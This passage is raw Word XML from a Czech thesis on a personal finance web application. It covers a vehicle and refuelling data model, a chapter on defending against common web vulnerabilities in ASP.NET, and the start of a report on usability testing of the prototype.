      <w:r>
        <w:t>Vozidla jsou modelován</w:t>
      </w:r>
      <w:r w:rsidR="004B6220">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> třídou </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A0E40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Vehicle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Každé vozidlo má vazbu na štítek, kterým jsou označovány transakce související s jeho provozem. Tankování vozidla představuje třída </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A0E40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Refuelling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, která je vždy navázána na transakci a rozšiřuje ji o počet natankovaných litrů (vlastnost </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A0E40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>RefuellingUnits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">), jejich jednotkovou cenu (vlastnost </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A0E40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>RefuellingUnitCost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) a v případě dotankování plné nádrže (označeno příznakem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A0E40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>RefuellingFullTank</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) také o stav tachometru (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A0E40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>RefuellingTachometer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00055A0A" w:rsidRDefault="00055A0A" w:rsidP="00055A0A">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="188" w:name="_Toc387327881"/>
      <w:r>
        <w:t>Zabezpečení aplikace</w:t>
      </w:r>
      <w:bookmarkEnd w:id="188"/>
    </w:p>
    <w:p w:rsidR="00BA3D0F" w:rsidRPr="00BA3D0F" w:rsidRDefault="00BA3D0F" w:rsidP="00BA3D0F">
      <w:r>
        <w:t>V této kapitole bude popsáno</w:t>
      </w:r>
      <w:r w:rsidR="00C341F5">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jakým konkrétním způsobem se při implementaci aplikace za použití navržených technologií zajistí její odolnost vůči bezpečnostním zranitelnostem uvedeným v</w:t>
      </w:r>
      <w:r w:rsidR="00C341F5">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>kapitole</w:t>
      </w:r>
      <w:r w:rsidR="00C341F5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C341F5">
        <w:instrText xml:space="preserve"> REF _Ref383961674 \w \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref383961674 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>Zabezpečení webových aplikací</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00055A0A" w:rsidRDefault="00BA3D0F" w:rsidP="00BA3D0F">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="189" w:name="_Toc387327882"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BA3D0F" w:rsidRDefault="005020C8" w:rsidP="00BA3D0F">
      <w:r>
        <w:t>Datová vrstva</w:t>
      </w:r>
      <w:r w:rsidR="00BA3D0F">
        <w:t xml:space="preserve"> bude používat výhradně parametrizované databázové dotazy, které.NET </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA3D0F">
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA3D0F">
        <w:t xml:space="preserve"> nabízí</w:t>
      </w:r>
      <w:r w:rsidR="0067448D">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BA3D0F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F0089">
        <w:t>případně bude</w:t>
      </w:r>
      <w:r w:rsidR="00BA3D0F">
        <w:t xml:space="preserve"> použ</w:t>
      </w:r>
      <w:r>
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="00BA3D0F">
        <w:t xml:space="preserve"> ORM Entity Framework</w:t>
      </w:r>
      <w:r w:rsidR="005F0089">
        <w:t xml:space="preserve"> nebo</w:t>
      </w:r>
      <w:r w:rsidR="00BA3D0F">
        <w:t xml:space="preserve"> LINQ to SQL, které zabezpečení proti této zranitelnosti zajistí automaticky. Veškeré uživatelem zadávané hodnoty budou také validovány jak v klientské, tak v serverové části aplikace.</w:t>
      </w:r>
      <w:r w:rsidR="00DC51CC">
        <w:t xml:space="preserve"> K přístupu k databázi bude používán účet, který bude mít pouze nutná oprávnění pro čtení a zápis do </w:t>
      </w:r>
      <w:r w:rsidR="00D11C0D">
        <w:t>potřebných</w:t>
      </w:r>
      <w:r w:rsidR="00DC51CC">
        <w:t xml:space="preserve"> tabulek.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0631B" w:rsidRDefault="00C0631B" w:rsidP="00C0631B">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="190" w:name="_Toc387327883"/>
      <w:r>
        <w:t>Zranitelná autentizace nebo správa relace</w:t>
      </w:r>
      <w:bookmarkEnd w:id="190"/>
    </w:p>
    <w:p w:rsidR="00C0631B" w:rsidRDefault="00C0631B" w:rsidP="00C0631B">
      <w:r>
        <w:t xml:space="preserve">Pro přihlašování budou použity vestavěné mechanismy ASP.NET </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>frameworku</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, nebude implementován vlastní způsob autentizace. ASP.NET používá pro identifikaci relace </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cookies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, které mají automaticky příznak </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Jiné způsoby identifikace relace, například pomocí identifikátoru v URL, nebudou povoleny. Relace bude mít krátkou dobu platnosti a nebude umožněno trvalé přihlášení uživatele. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F0089" w:rsidRDefault="00C0631B" w:rsidP="00BA3D0F">
      <w:r>
        <w:t xml:space="preserve">Uživatelské jméno a heslo bude muset splnit požadavky na minimální délku a použití dostatečně velké množiny znaků. Před změnou přihlašovacích údajů se bude muset uživatel znovu přihlásit, aby ověřil svoji identitu (viz </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005F0089">
        <w:instrText xml:space="preserve"> REF _Ref387324185 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>UC03: Změna údajů uživatele</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0631B" w:rsidRDefault="00C0631B" w:rsidP="00BA3D0F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Při obnovení přístupu k uživatelskému účtu bude využit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> s omezenou platností zaslaný na uživatelovu emailovou adresu (viz scénář</w:t>
      </w:r>
      <w:r w:rsidR="005F0089">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005F0089">
        <w:instrText xml:space="preserve"> REF _Ref387324239 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>UC04: Obnovení uživatelského účtu při zapomenutí hesla</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>), aplikace nebude nikdy zasílat uživatelské jméno nebo heslo na email.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760951" w:rsidRDefault="00760951" w:rsidP="00760951">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="191" w:name="_Toc387327884"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cross</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Site</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Scripting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (XSS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="191"/>
    </w:p>
    <w:p w:rsidR="00760951" w:rsidRDefault="00760951" w:rsidP="00BA3D0F">
      <w:r>
        <w:t xml:space="preserve">ASP.NET automaticky validuje všechny HTTP požadavky a odmítne ty, které obsahují nebezpečné znaky. Před vložením dat do stránky se vždy provede </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enkódování</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTML značek. V případě, kdy se budou hodnoty předávat klientským skriptům </w:t>
      </w:r>
      <w:r w:rsidR="005F0089">
        <w:t>se</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ještě navíc </w:t>
      </w:r>
      <w:r w:rsidR="005F0089">
        <w:t xml:space="preserve">budou </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enkódovat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> také speciální znaky </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JavaScriptu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, jak</w:t>
      </w:r>
      <w:r w:rsidR="005F0089">
        <w:t>ými</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jsou</w:t>
      </w:r>
      <w:r w:rsidR="005F0089">
        <w:t xml:space="preserve"> například</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uvozovky nebo apostrofy ukončující řetězec.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0631B" w:rsidRDefault="00C0631B" w:rsidP="00C0631B">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="192" w:name="_Toc387327885"/>
      <w:r>
        <w:t>Nezabezpečená přímá reference objektů a kontrola oprávnění</w:t>
      </w:r>
      <w:bookmarkEnd w:id="192"/>
    </w:p>
    <w:p w:rsidR="00C0631B" w:rsidRDefault="00C0631B" w:rsidP="00BA3D0F">
      <w:r>
        <w:t xml:space="preserve">Při přístupu ke každému datovému objektu bude kontrolováno, zda patří přihlášenému uživateli. Pokud se bude uživatel snažit přistoupit k objektu jiného uživatele, bude se aplikace chovat </w:t>
      </w:r>
      <w:r w:rsidR="005F0089">
        <w:t xml:space="preserve">stejně, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">jako kdyby daný objekt v systému vůbec </w:t>
      </w:r>
      <w:r w:rsidR="005F0089">
        <w:t>neexistoval</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Aplikace bude interně používat reference pomocí číselných identifikátorů, ale z pohledu uživatele budou objekty </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>referencovány</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pomocí jejich GUID.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0631B" w:rsidRDefault="00C0631B" w:rsidP="00C0631B">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="193" w:name="_Toc383358316"/>
      <w:bookmarkStart w:id="194" w:name="_Toc387327886"/>
      <w:r>
        <w:t>Špatná konfigurace zabezpečení</w:t>
      </w:r>
      <w:bookmarkEnd w:id="193"/>
      <w:bookmarkEnd w:id="194"/>
    </w:p>
    <w:p w:rsidR="00C0631B" w:rsidRDefault="00C0631B" w:rsidP="00BA3D0F">
      <w:r>
        <w:t xml:space="preserve">V produkčním prostředí bude vypnuto </w:t>
      </w:r>
      <w:r w:rsidR="00EF2F8F">
        <w:t>ladění</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a v případě chyby nebudou uživateli zobrazeny žádné technické detaily, ty se pouze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zalogují</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> na serveru pro interní použití. Citlivé údaje v konfiguračním souboru aplikace, jako jsou například připojovací řetězce k databázi, budou šifrované. Administraci serveru bude možné provádět pouze pomocí zabezpečených kanálů, nezabezpečené služby jak</w:t>
      </w:r>
      <w:r w:rsidR="00C70703">
        <w:t>ými</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> je například FTP</w:t>
      </w:r>
      <w:r w:rsidR="00C70703">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nebudou vůbec aktivované.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760951" w:rsidRDefault="00760951" w:rsidP="00760951">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="195" w:name="_Toc387327887"/>
      <w:r>
        <w:t>Únik citlivých dat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="195"/>
    </w:p>
    <w:p w:rsidR="00760951" w:rsidRDefault="00760951" w:rsidP="00760951">
      <w:r>
        <w:t xml:space="preserve">Přihlašovací heslo uživatele bude v databázi uloženo jako </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> se solí, která bude unikátní pro každého uživatele. Pro </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashování</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bude použit algoritmus SHA-2 s délkou 512 bitů. Veškerá data budou přenášen</w:t>
      </w:r>
      <w:r w:rsidR="00C70703">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mezi serverem a klientem šifrovaným kanálem HTTPS. Při přistoupení přes protokol HTTP bude uživatel automaticky přesměrován na zabezpečenou verzi stránek. Doména aplikace bude zabezpečena pomocí DNSSEC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760951" w:rsidRDefault="00760951" w:rsidP="00760951">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="196" w:name="_Toc387327888"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Coss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Site</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Forgery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (CSRF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="196"/>
    </w:p>
    <w:p w:rsidR="00760951" w:rsidRDefault="0085360E" w:rsidP="00C5203A">
      <w:r>
        <w:t>Všechna data budou na server odesílána pomocí POST (nebo PUT) požadavku, nikoliv GET</w:t>
      </w:r>
      <w:r w:rsidR="00023672">
        <w:t xml:space="preserve"> požadavkem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Každý formulář vygeneruje unikátní </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, který bude v</w:t>
      </w:r>
      <w:r w:rsidR="00023672">
        <w:t>alidován při odeslání formuláře na server.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00023672">
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uto funkcionalitu poskytuje přímo ASP.NET MVC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00023672">
        <w:t>tudíž</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ji </w:t>
      </w:r>
      <w:r w:rsidR="00023672">
        <w:t xml:space="preserve">není třeba </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">implementovat, </w:t>
      </w:r>
      <w:r w:rsidR="00023672">
        <w:t>ale pouze</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> správně použít.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004970A4" w:rsidRDefault="004970A4" w:rsidP="004970A4">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="197" w:name="_Toc383358328"/>
      <w:bookmarkStart w:id="198" w:name="_Toc387327889"/>
      <w:r>
        <w:t>Komponenty se známými zranitelnostmi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="197"/>
      <w:bookmarkEnd w:id="198"/>
    </w:p>
    <w:p w:rsidR="004970A4" w:rsidRPr="004970A4" w:rsidRDefault="004970A4" w:rsidP="004970A4">
      <w:r>
        <w:t xml:space="preserve">Aplikace bude hostována na profesionálním </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostingu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> nebo v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cloudu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Microsoft Azure, který garantuje určitou míru zabezpečení a automatickou aplikaci dostupných aktualizací. Budou použity nejnovější verze všech </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>framewo</w:t>
      </w:r>
      <w:r w:rsidR="00833FAA">
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>ků</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a knihoven, nejlépe pomocí </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nuget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> balíčků, které zajistí jednoduché přechody na budoucí novější verze.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760951" w:rsidRDefault="00760951" w:rsidP="00760951">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="199" w:name="_Toc383358330"/>
      <w:bookmarkStart w:id="200" w:name="_Toc387327890"/>
      <w:r>
        <w:t>Neověřené přesměrování</w:t>
      </w:r>
      <w:bookmarkEnd w:id="199"/>
      <w:bookmarkEnd w:id="200"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F5467E" w:rsidRPr="00D5261C" w:rsidRDefault="00D97443" w:rsidP="00D5261C">
      <w:r>
        <w:t xml:space="preserve">Aplikace nebude nikdy přesměrovávat na adresu přijatou </w:t>
      </w:r>
      <w:r w:rsidR="00945C81">
        <w:t>nějakou formou v</w:t>
      </w:r>
      <w:r>
        <w:t> požadavku. Veškeré případné přesměrování bude probíhat pouze na předem definované adresy přímo v</w:t>
      </w:r>
      <w:r w:rsidR="00B45CB0">
        <w:t>e zdrojovém</w:t>
      </w:r>
      <w:r>
        <w:t> kódu aplikace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3033A" w:rsidRDefault="00F3033A" w:rsidP="00F3033A">
      <w:pPr>
        <w:pStyle w:val="Nadpis1"/>
      </w:pPr>
      <w:bookmarkStart w:id="201" w:name="_Toc387327891"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Prototyp aplikace</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201"/>
    </w:p>
    <w:p w:rsidR="00020C01" w:rsidRDefault="00020C01" w:rsidP="00020C01">
      <w:r>
        <w:t xml:space="preserve">V rámci diplomové práce byl vytvořen funkční prototyp aplikace určený k provedení uživatelského testování navrhnutého řešení. </w:t>
      </w:r>
      <w:r w:rsidR="00D40233">
        <w:t xml:space="preserve">Toto testování bylo zaměřeno na ověření pochopitelnosti koncepce aplikace a </w:t>
      </w:r>
      <w:r w:rsidR="00767A1F">
        <w:t>dobré</w:t>
      </w:r>
      <w:r w:rsidR="00D40233">
        <w:t xml:space="preserve"> uživatelsk</w:t>
      </w:r>
      <w:r w:rsidR="00767A1F">
        <w:t>é</w:t>
      </w:r>
      <w:r w:rsidR="00D40233">
        <w:t xml:space="preserve"> použitelnost</w:t>
      </w:r>
      <w:r w:rsidR="00767A1F">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00D40233">
        <w:t xml:space="preserve"> základních </w:t>
      </w:r>
      <w:r w:rsidR="00360F06">
        <w:t>případů užití</w:t>
      </w:r>
      <w:r w:rsidR="00D40233">
        <w:t xml:space="preserve"> týkajících se evidence příjmů a výdajů.</w:t>
      </w:r>
      <w:r w:rsidR="00767A1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77FCF" w:rsidRDefault="00767A1F" w:rsidP="00020C01">
      <w:r>
        <w:t xml:space="preserve">Doporučení pro vedení uživatelských testování jsou například v knize </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Webdesign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Nenuťte uživatele přemýšlet </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="12066501"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION deVAJcbTgKKOs1K9 \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[2]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>. Testování proběhlo na čtyřech uživatelích, kteří se k němu dobrovolně přihlásili. Každý z nich měl za úkol v aplikaci projít vytisknutý testovací scénář a přitom nahlas vyslovovat vše, co ho v danou chvíli napadne – většinou to znamená odpovědi na otázky typu: „Co vidím na obrazovce a jaký to má význam?“, „Co zde mohu udělat?“, „Proč klikám zrovna sem?“, „Jak</w:t>
      </w:r>
      <w:r w:rsidR="00FC7F7B">
        <w:t xml:space="preserve"> na mě aplikace působí</w:t>
      </w:r>
      <w:r>
        <w:t>?“ a</w:t>
      </w:r>
      <w:r w:rsidR="00FC7F7B">
        <w:t>pod</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00020C01" w:rsidRDefault="00FF7A2F" w:rsidP="00020C01">
      <w:r>
        <w:t xml:space="preserve">Dále budou popsány jednotlivé kroky </w:t>
      </w:r>
      <w:r w:rsidR="00750D45">
        <w:t xml:space="preserve">testovacího </w:t>
      </w:r>
      <w:r>
        <w:t>scénáře a každý z nich bude vyhodnocen</w:t>
      </w:r>
      <w:r w:rsidR="00056DF1">
        <w:t xml:space="preserve"> vzhledem k</w:t>
      </w:r>
      <w:r w:rsidR="009D62F1">
        <w:t xml:space="preserve">e zpětné vazbě </w:t>
      </w:r>
      <w:r w:rsidR="00490AFA">
        <w:t>od uživatelů</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00020C01" w:rsidRDefault="00B76D0C" w:rsidP="00C77FCF">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="202" w:name="_Toc387327892"/>
      <w:r>
        <w:t>Registrace</w:t>
      </w:r>
      <w:r w:rsidR="00C77FCF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uživatele </w:t>
      </w:r>
      <w:r w:rsidR="00C77FCF">
        <w:t>a přihlášení</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202"/>
    </w:p>
    <w:p w:rsidR="00C77FCF" w:rsidRPr="00C77FCF" w:rsidRDefault="00C77FCF" w:rsidP="00C77FCF">
      <w:r>
        <w:t xml:space="preserve">Uživatelé byli vyzváni k vytvoření nového uživatelského účtu a přihlášení do aplikace. K přihlášení slouží obrazovka </w:t>
      </w:r>
      <w:r w:rsidR="003D62FC">
        <w:t>zobrazená na</w:t>
      </w:r>
      <w:r w:rsidR="00B76D0C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="003D62FC">
        <w:instrText xml:space="preserve"> REF _Ref386980151 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003D62FC">
        <w:t xml:space="preserve"> Žádný z uživatelů neměl problém se splněním tohoto úkolu, všichni okamžitě zvolili možnost vytvoření nového účtu a vyplnili registrační formulář (</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="003D62FC">
        <w:instrText xml:space="preserve"> REF _Ref386980369 \h </w:instrText>
      </w:r>
